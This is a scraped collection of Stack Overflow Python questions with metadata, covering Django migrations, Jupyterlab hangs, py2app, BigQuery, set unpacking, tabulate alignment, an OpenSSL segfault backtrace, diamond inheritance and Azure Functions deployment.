<pre class="lang-py prettyprint-override"><code># Generated by Django 3.2.25 on 2025-01-15 23:52
import django.db.models.expressions
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("some_app", "0066_user"),
]
operations = [
migrations.AddField(
model_name="user",
name="garden_description",
field=models.CharField(blank=True, max_length=32, null=True),
),
migrations.AddField(
model_name="user",
name="has_garden",
field=models.BooleanField(default=False),
),
migrations.AddConstraint(
model_name="user",
constraint=models.CheckConstraint(
check=models.Q(
("has_garden", django.db.models.expressions.Value(True)),
("garden_description__isnull", True),
),
name="garden_description_if_has_garden",
),
),
]
</code></pre>
|
<python><django>
|
2025-01-16 00:12:30
| 2
| 820
|
Adrian Guerrero
|
79,359,954
| 3,446,351
|
Jupyterlab occasionally hangs during simple execution with excessive CPU and memory consumption
|
<p>This is seems to be a Heisenbug so I can't give a reproducible example but I can describe my setup and symptoms.</p>
<p><strong>The symptoms</strong> are simple, occasionally (once every few days, though they seem to cluster) I will execute a simple cell in Jupyterlab, for instance even 1+1 and the kernel will stay busy, sometimes for many seconds and sometimes, like the case I'm watching right now, for 10+ minutes and shows no sign of stopping. CPU is at 100% (for that core) and memory consumption of that process is growing at approximately 1Mb/sec.</p>
<p>I use the jupyterlab-execute-time extension and one additional symptom of this effect is that when it occurs the running execution time footer to the lower right of the running cell, showing live execution time, does <strong>not</strong> appear during execution (I assume because the <em>true</em> execution time is too short for this to be shown).</p>
<p>If the execution does eventually cease then the final execution time is shown to the lower right of the input cell. In the case of something like 1+1 this will show as something like 10ms even though the execution took several seconds at 100% CPU.</p>
<p>Occasionally the execute time extension will write the total execution time below the running cell (in some cases where the actual execution time is O(10ms)) but the kernel continues to run and show busy (and the running cell marked with a *) for several seconds after (if it ever finishes).</p>
<p>I also use the ipywidgets plugin and I suspect this is the root of the problem though waiting for an effect to not occur isn't easy to quantify.</p>
<p><strong>The setup.</strong>
I am running on windows10, python 3.12.8 Jupyter running in a conda-controlled environment with...</p>
<pre><code>jupyter-lsp=2.2.5=pyhd8ed1ab_1
jupyter-server-mathjax=0.2.6=pyhbbac1ac_2
jupyter_client=8.6.3=pyhd8ed1ab_1
jupyter_core=5.7.2=pyh5737063_1
jupyter_events=0.11.0=pyhd8ed1ab_0
jupyter_server=2.15.0=pyhd8ed1ab_0
jupyter_server_terminals=0.5.3=pyhd8ed1ab_1
jupyterlab=4.3.4=pyhd8ed1ab_0
jupyterlab-git=0.50.2=pyhd8ed1ab_1
jupyterlab_pygments=0.3.0=pyhd8ed1ab_2
jupyterlab_server=2.27.3=pyhd8ed1ab_1
</code></pre>
<p>and ipywidgets 8.1.5 in the kernel environment.</p>
<p>I have reinstalled both environments several times from scratch and the behaviour is persistent.</p>
<p>This feels like the same "kind" of issue with the <a href="https://github.com/jupyterlab/jupyterlab/issues/6267" rel="nofollow noreferrer">variable inspector extension</a> from some time back. But I don't have that extension installed.</p>
<p>Has anyone else seen similar?</p>
<p><strong>Update</strong>: I believe this (often) happens when the cell in question throws an exception resulting in a stacktrace which for some reason either takes a very long time to render or enters an infinite loop.</p>
<p><strong>Update</strong>: I have removed ipywidgets but still see this kind of issue. Just now 1+1 took 7 seconds to return 2. I now suspect this is some issue with pushing the result back into a large notebook. Though the kernel that is busy is the notebook kernel not the Jupyter kernel.</p>
|
<python><jupyter-lab>
|
2025-01-15 23:05:19
| 0
| 691
|
Ymareth
|
79,359,931
| 1,050,482
|
py2app: error: [Errno 17] File exists: when creating the app
|
<p>I'm trying to make a MacOS executable with py2app. I'm having the exact same issue in <a href="https://stackoverflow.com/questions/78859635/py2app-error-17-file-exists-when-running-py2app-for-the-first-time">py2app Error 17 - File exists when running py2app for the first time</a></p>
<p>But the solution there won't work for since I don't have .tml file. How can I downgrade setup tools?</p>
|
<python><macos><py2app>
|
2025-01-15 22:49:11
| 1
| 8,761
|
Paul Cezanne
|
79,359,870
| 479,583
|
Why doesn't my collab virtual machine have the capacity to query something in bigquery, but it can process that same query result?
|
<p>I'm aware that my question is somewhat vague, but I didn't know how to frame it in a different matter.</p>
<p>I started using GCP in my latest detachment and there are a few things I'm having issues grasping.</p>
<p>For once, I don't understand why I can process data using</p>
<pre><code>query = f"SELECT * FROM {dataset_name}"
dataset = client.query(query).to_dataframe()
</code></pre>
<p>But if If I try to do the actual query that created dataset_name in bigquery (bypassing the need to save it beforehand), the machine times out (or runs out of memory).
I would think that when I did something like client.query() the grunt work would be taken by bigquery and colab (or vertex or whatever you're using) would just chill and wait to get the output.</p>
<p>What gives?</p>
|
<python><google-bigquery><google-colaboratory>
|
2025-01-15 22:22:08
| 1
| 425
|
Roughmar
|
79,359,697
| 2,800,876
|
Why does Python tuple unpacking work on sets?
|
<p><a href="https://stackoverflow.com/a/3812600/2800876">Sets don't have a deterministic order in Python</a>. Why then can you do tuple unpacking on a set in Python?</p>
<p>To demonstrate the problem, take the following in CPython 3.10.12:</p>
<pre><code>a, b = {"foo", "bar"} # sets `a = "bar"`, `b = "foo"`
a, b = {"foo", "baz"} # sets `a = "foo"`, `b = "baz"`
</code></pre>
<p>I recognize that the literal answer is that Python tuple unpacking works on any iterable. For example, you can do the following:</p>
<pre><code>def f():
yield 1
yield 2
a, b = f()
</code></pre>
<p>But why is there not a check used by tuple unpacking that the thing being unpacked has deterministic ordering?</p>
|
<python><iterable-unpacking>
|
2025-01-15 21:06:11
| 3
| 41,868
|
Zags
|
79,359,592
| 1,119,649
|
Python tabulate - when using icons result in misaligned table
|
<p>When I use icons in tabulate, the printed table comes out misaligned.</p>
<p>Sample:</p>
<pre class="lang-py prettyprint-override"><code>import tabulate
print(tabulate.tabulate([{'head':'msg', 'head2': 'msg2'},{'head':'msg 😀', 'head2': 'msg2 😶'}], headers='keys', tablefmt="grid"))
</code></pre>
<p>Results in:</p>
<p><a href="https://i.sstatic.net/oI3f0vA4.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/oI3f0vA4.png" alt="resulting misaligned table" /></a></p>
<p>Is there any way to solve this?</p>
|
<python><tabulate>
|
2025-01-15 20:15:43
| 1
| 386
|
Shoo Limberger
|
79,359,469
| 3,477,266
|
Debug Segmentation Fault on Python cryptography's OpenSSL bindings
|
<p>My application runs on a Docker container, and it has always run well in AWS VMs.</p>
<p>While trying to deploy some VMs in GCP, I noticed Segmentation Fault errors were killing the container in some of them.</p>
<p>It doesn't seem to exist an obvious pattern. The application runs well for days, and then just dies. Sometimes less, sometimes more days.</p>
<p>I was able to generate core dumps from the crashes, but I'm having a hard time figuring them out.</p>
<p>The farthest I went was to get the backtrace below using <code>gdb</code>. I was able to get it after mounting the core dump in a similar container as the original.</p>
<p>It contains some functions in OpenSSL, which are called by the <code>cryptography's</code> package C bindings for OpenSSL.</p>
<p>However, I can't find a way to determine what is causing this segmentation fault. I already had several cases of VMs that died in a very similar way, all pointing to OpenSSL in their core dumps.</p>
<p>Also, I couldn't get Python debug symbols to work in this container. I'm not sure this would be useful, though. It's a Debian 11 image that is set up to use python3.10 as default, but there is no <code>apt install python3.10-dbg</code> available, only for Python 3.9.</p>
<p>I'm also not sure how exactly the host is interfering with the container to cause this, since even the OpenSSL bindings that are used come bundled into the cryptography package.</p>
<p>I was trying to avoid building a new Docker image to debug this, because I'm afraid I could interfere somehow with the problem, since this very same image runs very well on AWS. But that's a possibility in case it helps.</p>
<p>If anyone has any tip on new strategies for debugging this, how to find out the role the host is playing in the problem, or general guesses on what might be happening, would help me a lot.</p>
<p>Versions:</p>
<ul>
<li>cryptography: 38.0.4</li>
<li>OpenSSL (bundled with cryptography): 3.0.7</li>
</ul>
<pre><code># gdb /usr/local/bin/python3.10 /core.dump
(gdb) bt full
#0 0x0000f93ee103cd78 in _PyErr_SetObject () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
#1 0x0000f93ee10c6a24 in _PyErr_SetString () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
#2 0x0000f93ee1044244 in ?? () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
#3 0x0000f93ede93d5d8 in OPENSSL_LH_doall_arg ()
from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#4 0x0000f93ede93f02c in ossl_namemap_doall_names ()
from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#5 0x0000f93edea58a20 in OSSL_ENCODER_CTX_new_for_pkey ()
from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#6 0x0000f93ede9a1cac in i2d_PUBKEY () from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#7 0x0000f93ede8b3390 in ASN1_i2d_bio ()
from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#8 0x0000f93ede83c524 in _cffi_f_i2d_PUBKEY_bio (self=<optimized out>, args=<optimized out>)
at build/temp.linux-aarch64-3.6/cryptography.hazmat.bindings._openssl.c:43855
_save = 0xbeefaa544190
x0 = 0xbeefcea289d0
x1 = 0xbeefaa605e00
datasize = <optimized out>
large_args_free = 0x0
result = <optimized out>
pyresult = <optimized out>
arg0 = 0xf93afffc2020
arg1 = 0xf93edd594d10
#9 0x0000f93ee10374b4 in ?? () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
#10 0x0000f93ee104130c in _PyObject_Call () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
</code></pre>
<p>Besides this, I've also enabled Python's faulthandler to get a stack trace when the application crashes. I'm not pasting it entirely, but the last 2 lines also point to OpenSSL:</p>
<pre><code>Current thread 0x0000f8e17e8bbd40 (most recent call first):
File "/usr/local/lib/python3.10/site-packages/cryptography/hazmat/backends/openssl/backend.py", line 1024 in load_der_public_key
File "/usr/local/lib/python3.10/site-packages/cryptography/hazmat/primitives/serialization/base.py", line 56 in load_der_public_key
</code></pre>
|
<python><c><linux><openssl><gdb>
|
2025-01-15 19:28:48
| 0
| 1,516
|
luislhl
|
79,359,452
| 15,994,504
|
Diamond Relationship class hierarchy override only one instance of the method inherited from Base Class
|
<p>With a Diamond Relationship class hierarchy, how can I override the B.x while having the C.x continue to inherit from A.x</p>
<p>My goal is to not edit class A, B, or C since those are used by other classes (e.g. a class E)
However as long as the edits to class A, B, C would not change the behavior for other imports of those classes, editing A, B, or C would be okay.</p>
<p>I think the MRO is, D -> B -> C -> A
Does this mean A can only be overridden one time?</p>
<hr />
<h4>Example code - attempt 1</h4>
<pre><code>from dataclasses import dataclass
@dataclass
class A:
@property
def x(self):
return 'a'
@dataclass
class B(A):
def B_method(self):
print(f'{self.x}_B_method')
return
@dataclass
class C(A):
def C_method(self):
print(f'{self.x}_C_method')
return
@dataclass
class D(B, C):
def D_method(self):
B.x = 'b'
self.B_method()
self.C_method()
class_D = D()
class_D.D_method()
</code></pre>
<h4>Example code - attempt 2</h4>
<pre><code>from dataclasses import dataclass
@dataclass
class A:
@property
def x(self):
return 'a'
@dataclass
class B(A):
@property
def x(self):
return 'a'
def B_method(self):
print(f'{self.x}_B_method')
return
@dataclass
class C(A):
@property
def x(self):
return 'a'
def C_method(self):
print(f'{self.x}_C_method')
return
@dataclass
class D(B, C):
def D_method(self):
B.x = 'b'
self.B_method()
self.C_method()
class_D = D()
class_D.D_method()
</code></pre>
<h4>Example Output</h4>
<pre><code>b_B_method
b_C_method
</code></pre>
<h4>Desired output</h4>
<pre><code>b_B_method
a_C_method
</code></pre>
|
<python><python-3.x><method-resolution-order>
|
2025-01-15 19:23:51
| 1
| 374
|
smurphy
|
79,359,444
| 12,712,848
|
Can't add libraries to function_app.py in azure Function
|
<p>I have, for example, this function</p>
<p><a href="https://i.sstatic.net/pBaLBBvf.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/pBaLBBvf.png" alt="enter image description here" /></a></p>
<p>I deployed it with VS Code using the following <code>F1</code> option in VS Code
<a href="https://i.sstatic.net/fzHCajG6.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/fzHCajG6.png" alt="enter image description here" /></a></p>
<p>Nonetheless, when I go to the function app portal, it shows nothing under the functions submenu:
<a href="https://i.sstatic.net/nuUeDUxP.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/nuUeDUxP.png" alt="enter image description here" /></a></p>
<p>I don't know why I am not being able to see my functions in my function app, what am I missing?</p>
<p>Here is the dummy code of the function:</p>
<pre><code>import azure.functions as func
import logging
import os
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
from azure.communication.email import EmailClient
from datetime import timezone, timedelta, datetime
import jwt
import bcrypt
import pymssql
import json
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
app = func.FunctionApp(http_auth_level=func.AuthLevel.ANONYMOUS)
@app.route(route="actualizar_contrasena", auth_level=func.AuthLevel.ANONYMOUS)
def actualizar_contrasena(req: func.HttpRequest) -> func.HttpResponse:
import json
try:
req_body = req.get_json()
username_to_check = req_body.get("username")
password_to_check = str(req_body.get("password"))
# do things
return func.HttpResponse(
json.dumps(
{"access_token": 1, "refresh_token": 1}
),
status_code=200,
)
except Exception as e:
return func.HttpResponse(str(e), status_code=500)
</code></pre>
<p><strong>UPDATE</strong></p>
<p>After following @RithwikBoj instructions, I'm in the same situation. I have observed that locally I can't see the functions neither:</p>
<p><a href="https://i.sstatic.net/LRo9RZAd.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/LRo9RZAd.png" alt="enter image description here" /></a></p>
<p>This is my <code>host.json</code>:</p>
<pre><code>{
"version": "2.0",
"logging": {
"applicationInsights": {
"samplingSettings": {
"isEnabled": true,
"excludedTypes": "Request"
}
}
},
"extensionBundle": {
"id": "Microsoft.Azure.Functions.ExtensionBundle",
"version": "[4.*, 5.0.0)"
}
}
</code></pre>
<p>And this is my structure:</p>
<pre><code>root
|_.venv
|_.funcignore
|_host.json
|_function_app.py
|_ local.settings.json
</code></pre>
<p><a href="https://i.sstatic.net/L5t7Tsdr.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/L5t7Tsdr.png" alt="enter image description here" /></a></p>
<p>This is my requirements.txt</p>
<pre><code>azure-common==1.1.28
azure-communication-email==1.0.0
azure-core==1.32.0
azure-functions==1.21.3
azure-identity==1.19.0
azure-keyvault-secrets==4.9.0
azure-mgmt-core==1.5.0
bcrypt==4.2.1
certifi==2024.12.14
cffi==1.17.1
charset-normalizer==3.4.1
cryptography==44.0.0
idna==3.10
isodate==0.7.2
jwt==1.3.1
msal==1.31.1
msal-extensions==1.2.0
msrest==0.7.1
oauthlib==3.2.2
portalocker==2.10.1
pycparser==2.22
PyJWT==2.10.1
pymssql==2.3.2
requests==2.32.3
requests-oauthlib==2.0.0
six==1.17.0
typing_extensions==4.12.2
urllib3==2.3.0
</code></pre>
<p>I tried to deploy using my github repo. This is the yaml:</p>
<pre><code># Docs for the Azure Web Apps Deploy action: https://github.com/azure/functions-action
# More GitHub Actions for Azure: https://github.com/Azure/actions
# More info on Python, GitHub Actions, and Azure Functions: https://aka.ms/python-webapps-actions
name: Build and deploy Azure Function App - fnc-app-d
on:
push:
branches:
- develop
workflow_dispatch:
env:
AZURE_FUNCTIONAPP_PACKAGE_PATH: '.' # set this to the path to your web app project, defaults to the repository root
PYTHON_VERSION: '3.11' # set this to the python version to use (supports 3.6, 3.7, 3.8)
jobs:
build:
runs-on: ubuntu-latest
permissions:
contents: read #This is required for actions/checkout
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Setup Python version
uses: actions/setup-python@v5
with:
python-version: ${{ env.PYTHON_VERSION }}
- name: Create and start virtual environment
run: |
python -m venv venv
source venv/bin/activate
- name: Install dependencies
run: pip install -r requirements.txt
# Optional: Add step to run tests here
- name: Zip artifact for deployment
run: zip -r release.zip function_app.py host.json -x "*.txt venv/*" ".git/*" ".github/* *.md .gitignore local.*"
- name: Upload artifact for deployment job
uses: actions/upload-artifact@v4
with:
name: python-app
path: |
.
!venv/
deploy:
runs-on: ubuntu-latest
needs: build
permissions:
id-token: write #This is required for requesting the JWT
contents: read #This is required for actions/checkout
steps:
- name: Download artifact from build job
uses: actions/download-artifact@v4
with:
name: python-app
path: .
- name: Unzip artifact for deployment
run: unzip -o release.zip
- name: Login to Azure
uses: azure/login@v2
with:
client-id: ${{ secrets.AZUREAPPSERVICE_CLIENTID_06 }}
tenant-id: ${{ secrets.AZUREAPPSERVICE_TENANTID_88510E }}
subscription-id: ${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_38D5 }}
- name: 'Deploy to Azure Functions'
uses: Azure/functions-action@v1
id: deploy-to-function
with:
app-name: 'fnc-app-d'
package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
</code></pre>
<p>I realised that the requirements.txt has something wrong with it in the Function App
<a href="https://i.sstatic.net/OfyJgx18.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/OfyJgx18.png" alt="enter image description here" /></a></p>
<p>And the folder structure has not been updated, because I removed the Readme.md a while ago:
<a href="https://i.sstatic.net/3GKoMkMl.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/3GKoMkMl.png" alt="enter image description here" /></a></p>
<p><strong>UPDATE</strong>
I have edited the yaml, now it uploads the requirements.txt file correctly</p>
<p><strong>UPDATE 2</strong>
I have deleted all imports except os, logging and azure.functions. After that, I can deploy correctly my function. Butm when I for example add <code>import jwt</code> to the python script, it disappears again. I need to add libraries to the script, <strong>that is my main issue</strong></p>
<p><strong>UPDATE 3</strong> Adding the import inside the definition of each function seems to work:</p>
<pre><code>@app.route(route="log_in_user", auth_level=func.AuthLevel.ANONYMOUS)
def log_in_user(req: func.HttpRequest) -> func.HttpResponse:
import json
import jwt # ADDED HERE THE LIBRARY
try:
req_body = req.get_json()
username_to_check = req_body.get("username")
password_to_check = str(req_body.get("password"))
p = jwt.encode({"pass": password_to_check}, "assaasassa", algorithm="HS256")
return func.HttpResponse(
json.dumps(
{"access_token": 1, "refresh_token": 1, "p": p}
),
status_code=200,
)
except Exception as e:
return func.HttpResponse(str(e), status_code=500)
</code></pre>
<p>It is now deployed. But when I try to execute it in Azure:</p>
<pre><code>Result: Failure Exception: ModuleNotFoundError: No module named 'jwt'
</code></pre>
|
<python><azure><azure-functions>
|
2025-01-15 19:20:49
| 2
| 841
|
OK 400
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.